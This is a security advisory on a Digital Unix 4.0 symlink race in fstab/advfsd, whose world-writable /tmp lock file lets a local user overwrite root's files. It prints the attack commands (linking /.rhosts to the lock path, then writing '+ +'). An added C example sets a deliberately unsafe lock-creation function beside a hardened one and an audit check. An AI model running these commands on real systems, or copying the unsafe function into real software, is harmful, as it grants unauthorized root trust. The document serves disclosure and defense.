COMMAND

    fstab/advfsd

SYSTEMS AFFECTED

    Digital Unix V4.0, 4.0a, 4.0b, 4.0c, 4.0d

PROBLEM

    'Low Noise' posted the following.  The programs involved are fstab
    (static information about file systems and swap partitions) and
    advfsd (starts the AdvFS graphical user interface daemon).  It
    works fine.  The only problem is that it creates a lockfile in /tmp
    with nice permissions.  Let's see:

    /tmp>ls -la

    -rw-rw-rw-   1 root     system    0 Nov xx 15:49 fstab.advfsd.lockfile

    Very bad people will do something like the following.  Before it
    creates the lock file, do this:

    ln -s /.rhosts /tmp/fstab.advfsd.lockfile

    From here... cat "+ +" > /tmp/fstab.advfsd.lockfile , etc etc.

SOLUTION

    Digital strongly recommends upgrading to a minimum of Digital UNIX
    V4.0b accordingly, and that the appropriate patch kit be installed
    immediately.  This potential security problem has been resolved
    and an official patch for this problem has been made available as
    an early release kit for DIGITAL UNIX V4.0a
    (duv40ass0000600037800-19980317.*) and included in the latest
    DIGITAL UNIX V4.0b and V4.0d aggregate DUPATCH Kit:

        The V4.0 aggregate  BL 9 patch kit #6
         is scheduled for release mid May 1998.
        The V4.0c aggregate BL10 patch kit #6
         is scheduled for release mid May 1998.

    Go to:

        http://www.service.digital.com/html/patch_service.html

    and then choose the appropriate version directory and download the
    patch accordingly.  The appropriate patch kit must be installed
    following any upgrade to V4.0a, V4.0b or V4.0d.  As a workaround,
    you may touch the lock file and set appropriate permissions on it.
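
    The root cause above is a privileged daemon opening a predictable
    /tmp path in a way that follows symlinks and leaves the file
    world-writable.  The following is an added example, not code from
    the advisory or from Digital: the function names are hypothetical
    and the "unsafe" open() is an assumed reconstruction of the flawed
    pattern, shown beside a hardened lock-file creation and a check
    for an existing lock path.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L   /* for O_NOFOLLOW, lstat, fchmod */
#endif
#include <errno.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <unistd.h>

/* Assumed reconstruction of the flawed pattern (not Digital's code): no
 * O_EXCL, so a symlink planted at the path is followed and its target is
 * created or opened with the daemon's privileges, then left mode 0666. */
int lock_create_unsafe(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT, 0666);
    if (fd >= 0)
        fchmod(fd, 0666);   /* models the -rw-rw-rw- in the listing */
    return fd;
}

/* Hardened form: O_EXCL makes open() fail with EEXIST if anything, including
 * a dangling symlink, already sits at the path; mode is owner-only. */
int lock_create_safe(const char *path)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;          /* errno from open(), e.g. EEXIST */
    /* Defense in depth: confirm a plain, singly linked file, force 0600. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1 ||
        fchmod(fd, 0600) != 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Audit an existing lock path without following it. Returns -1 if it cannot
 * be examined, else a bitmask of the findings below (0 = nothing flagged). */
#define LOCK_IS_SYMLINK     1
#define LOCK_WORLD_WRITABLE 2
int lock_audit(const char *path)
{
    struct stat st;
    if (lstat(path, &st) != 0)
        return -1;
    if (S_ISLNK(st.st_mode))
        return LOCK_IS_SYMLINK;
    return (st.st_mode & S_IWOTH) ? LOCK_WORLD_WRITABLE : 0;
}
```

    A daemon using the hardened form should treat EEXIST as a reason
    to stop and report, not to retry by opening the existing path.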